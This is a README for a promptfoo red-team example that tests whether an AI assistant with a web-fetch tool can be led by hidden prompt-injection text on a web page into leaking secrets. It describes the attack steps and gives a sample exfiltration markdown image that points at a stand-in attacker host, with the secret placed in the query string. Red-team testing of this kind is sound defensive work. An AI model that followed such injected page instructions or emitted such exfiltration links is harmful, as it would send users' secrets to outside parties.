Files
promptfoo--promptfoo/examples/redteam-indirect-web-pwn
wehub-resource-sync 0d3cb498a3
CI / Shell Format Check (push) Has been cancelled
CI / Check Ruby (3.4) (push) Has been cancelled
CI / CI Config (push) Has been cancelled
CI / Test on Node ${{ matrix.node }} and ${{ matrix.os }}${{ matrix.shard && format(' (shard {0}/3)', matrix.shard) || '' }} (push) Has been cancelled
CI / Build on Node ${{ matrix.node }} (push) Has been cancelled
CI / Style Check (push) Has been cancelled
CI / Generate Assets (push) Has been cancelled
CI / Check Python (3.14) (push) Has been cancelled
CI / Check Python (3.9) (push) Has been cancelled
CI / Build Docs (push) Has been cancelled
CI / Code Scan Action (push) Has been cancelled
CI / Site tests (push) Has been cancelled
CI / webui tests (push) Has been cancelled
CI / Run Integration Tests (push) Has been cancelled
CI / Run Smoke Tests (push) Has been cancelled
CI / Go Tests (push) Has been cancelled
CI / Share Test (push) Has been cancelled
CI / Redteam (Production API) (push) Has been cancelled
CI / Redteam (Staging API) (push) Has been cancelled
CI / GitHub Actions Lint (push) Has been cancelled
CI / Check Ruby (3.0) (push) Has been cancelled
release-please / release-please (push) Has been cancelled
release-please / build (push) Has been cancelled
release-please / publish-npm (push) Has been cancelled
release-please / publish-npm-backfill (push) Has been cancelled
release-please / docker (push) Has been cancelled
release-please / publish-code-scan-action (push) Has been cancelled
release-please / attest-code-scan-action (push) Has been cancelled
Deploy local.promptfoo.app / Deploy to Cloudflare Pages (push) Has been cancelled
Test and Publish Multi-arch Docker Image / test (push) Has been cancelled
Test and Publish Multi-arch Docker Image / build-docker-and-push-digests (map[digest-suffix:linux-amd64 platform:linux/amd64 runner:ubuntu-latest]) (push) Has been cancelled
Test and Publish Multi-arch Docker Image / build-docker-and-push-digests (map[digest-suffix:linux-arm64 platform:linux/arm64 runner:ubuntu-24.04-arm]) (push) Has been cancelled
Test and Publish Multi-arch Docker Image / merge-docker-digests (push) Has been cancelled
Test and Publish Multi-arch Docker Image / Attest Multi-arch Image (push) Has been cancelled
Validate Renovate Config / Validate Renovate Configuration (push) Has been cancelled
chore: import upstream snapshot with attribution
2026-07-13 13:24:08 +08:00
..

redteam-indirect-web-pwn (Red Team Data Exfiltration via Indirect Web Prompt Injection)

You can run this example with:

npx promptfoo@latest init --example redteam-indirect-web-pwn
cd redteam-indirect-web-pwn

Introduction

This example demonstrates how to test an AI assistant for data exfiltration vulnerabilities using promptfoo's indirect-web-pwn strategy.

The attack works by:

  1. Creating a web page with hidden prompt injection instructions
  2. Asking the AI assistant to fetch and summarize the page
  3. The injected instructions attempt to trick the model into encoding sensitive data into URL query parameters (e.g., markdown images like ![img](http://attacker.com/exfil?api=SECRET))

The custom provider (provider.js) simulates a realistic AI assistant with a web_fetch tool that actually fetches URLs, making it a valid target for this attack.

Setup

  1. Install dependencies:
npm install
  1. Set your OpenAI API key:
export OPENAI_API_KEY=your-api-key-here

Running

Run the full red team scan (generates test cases and evaluates) in one command:

npx promptfoo@latest redteam run

View results:

npx promptfoo@latest view

What to Look For

  • FAIL results indicate the model attempted to exfiltrate data by embedding values in URL query parameters or markdown images
  • PASS results indicate the model refused the injection or did not attempt exfiltration